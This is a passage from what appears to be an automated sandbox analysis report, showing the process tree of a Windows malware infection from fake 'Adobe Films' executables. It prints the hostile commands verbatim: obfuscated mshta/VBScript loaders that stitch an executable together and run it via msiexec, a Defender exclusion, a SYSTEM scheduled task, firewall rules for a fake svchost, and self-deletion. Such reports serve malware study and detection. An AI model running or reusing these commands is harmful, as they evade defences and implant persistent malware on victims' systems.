                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:7028
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:60
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:6128
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:4496
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:6820
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:1096
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:6100
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:2068
                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:5248
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill -f -iM "1recqd0wnz8MYTSqt2EVk8kk.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:5868
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\2RQZs2lRHhHIqqQr_YCCMiQQ.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\2RQZs2lRHhHIqqQr_YCCMiQQ.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:5684
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\8_3pQA5UnihDPa9AHLGxcg8v.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\8_3pQA5UnihDPa9AHLGxcg8v.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3796
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9VCD9.tmp\8_3pQA5UnihDPa9AHLGxcg8v.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9VCD9.tmp\8_3pQA5UnihDPa9AHLGxcg8v.tmp" /SL5="$20498,506127,422400,C:\Users\Admin\Pictures\Adobe Films\8_3pQA5UnihDPa9AHLGxcg8v.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:2068
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-JD9G4.tmp\ShareFolder.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-JD9G4.tmp\ShareFolder.exe" /S /UID=2709
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                PID:2012
                                                                                                                                                                                                • C:\Program Files\Windows Photo Viewer\UNEVVHULNT\foldershare.exe
                                                                                                                                                                                                  "C:\Program Files\Windows Photo Viewer\UNEVVHULNT\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\12-96381-5f0-d738f-26060e8e929b7\Qilofijaede.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\12-96381-5f0-d738f-26060e8e929b7\Qilofijaede.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                    PID:1364
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\83-5bc6f-60a-cca9f-430d6c4cf1f51\Gihovoduro.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\83-5bc6f-60a-cca9f-430d6c4cf1f51\Gihovoduro.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:672
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eddd35pt.mqo\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:7564
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\eddd35pt.mqo\GcleanerEU.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\eddd35pt.mqo\GcleanerEU.exe /eufive
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:3644
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i4zeoafj.bzf\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:7768
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\i4zeoafj.bzf\installer.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\i4zeoafj.bzf\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                PID:7784
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\euyicvl1.fgg\any.exe & exit
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:7892
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\euyicvl1.fgg\any.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\euyicvl1.fgg\any.exe
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:8060
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o0dojkf4.zu3\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:8024
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\o0dojkf4.zu3\gcleaner.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\o0dojkf4.zu3\gcleaner.exe /mixfive
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:6856
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vh5kl5f2.ucm\autosubplayer.exe /S & exit
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:8132
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vh5kl5f2.ucm\autosubplayer.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\vh5kl5f2.ucm\autosubplayer.exe /S
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                          PID:8248
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp7033.tmp\tempfile.ps1"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:5936
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\J45YdlvWxBoQLQKu5cw_ERgd.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\J45YdlvWxBoQLQKu5cw_ERgd.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3208
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6656828.scr
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6656828.scr" /S
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:1856
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7642980.scr
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7642980.scr" /S
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:928
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:6284
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4616550.scr
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4616550.scr" /S
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                          PID:6368
                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:4552
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3518729.scr
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3518729.scr" /S
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                            PID:936
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5778475.scr
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5778475.scr" /S
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                            PID:6476
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7174384.scr
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7174384.scr" /S
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:5028
                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\tgdoWe9Qqt4pT7t1E_r5AuK_.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\tgdoWe9Qqt4pT7t1E_r5AuK_.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4252
                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\Ui9lRDsrDOBY9Bw0kdM6sB4V.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\Ui9lRDsrDOBY9Bw0kdM6sB4V.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                          PID:6040
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Ui9lRDsrDOBY9Bw0kdM6sB4V.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\Ui9lRDsrDOBY9Bw0kdM6sB4V.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6992
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /im Ui9lRDsrDOBY9Bw0kdM6sB4V.exe /f
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:6588
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:8260
                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ilMVSiqVrINTdE2VA7JjrtNZ.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ilMVSiqVrINTdE2VA7JjrtNZ.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            PID:6120
                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5940
                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5832
                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5820
                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\P044coH5h18c3mQEstpkz9rz.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\P044coH5h18c3mQEstpkz9rz.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6088
                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\NIMTNxmBdyCgIFApQLKwU8JH.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\NIMTNxmBdyCgIFApQLKwU8JH.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              PID:6076
                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\lHORr0hE9w3pwpXoFXjdztGn.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\lHORr0hE9w3pwpXoFXjdztGn.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:3184
                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\FGlOPymX6dSwyK6iwpIZcidj.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\FGlOPymX6dSwyK6iwpIZcidj.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              PID:5276
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:6164
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                  schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:6576
                                                                                                                                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:6556
                                                                                                                                                                                                                                  • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                    "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5840
                                                                                                                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3828
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\q7QJe8apd9_rB6eG4eeBj6a4.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\q7QJe8apd9_rB6eG4eeBj6a4.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\ZOn_8qhhJqpQkHH_ooh_xV7L.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\ZOn_8qhhJqpQkHH_ooh_xV7L.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:4592
                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ZOn_8qhhJqpQkHH_ooh_xV7L.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ZOn_8qhhJqpQkHH_ooh_xV7L.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                        PID:2328
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\S0rZMnaVb9LZVOoWWSkeCVyK.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\S0rZMnaVb9LZVOoWWSkeCVyK.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:6764
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\S0rZMnaVb9LZVOoWWSkeCVyK.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\S0rZMnaVb9LZVOoWWSkeCVyK.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6852
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\S0rZMnaVb9LZVOoWWSkeCVyK.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\S0rZMnaVb9LZVOoWWSkeCVyK.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:7080
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                                                                  8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:1788
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:6276
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:6460
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:4648
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:6460
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:6812
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:4676
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                      msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      PID:4820
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                taskkill -im "S0rZMnaVb9LZVOoWWSkeCVyK.exe" -F
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                PID:6524
                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\vJQDMTBGEsAk1Am5nEZ8jUZ0.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\vJQDMTBGEsAk1Am5nEZ8jUZ0.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:1980
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                            PID:5484
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--VWXGd"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                              PID:9108
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1c0,0x1e8,0x7fff1307dec0,0x7fff1307ded0,0x7fff1307dee0
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:9084
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
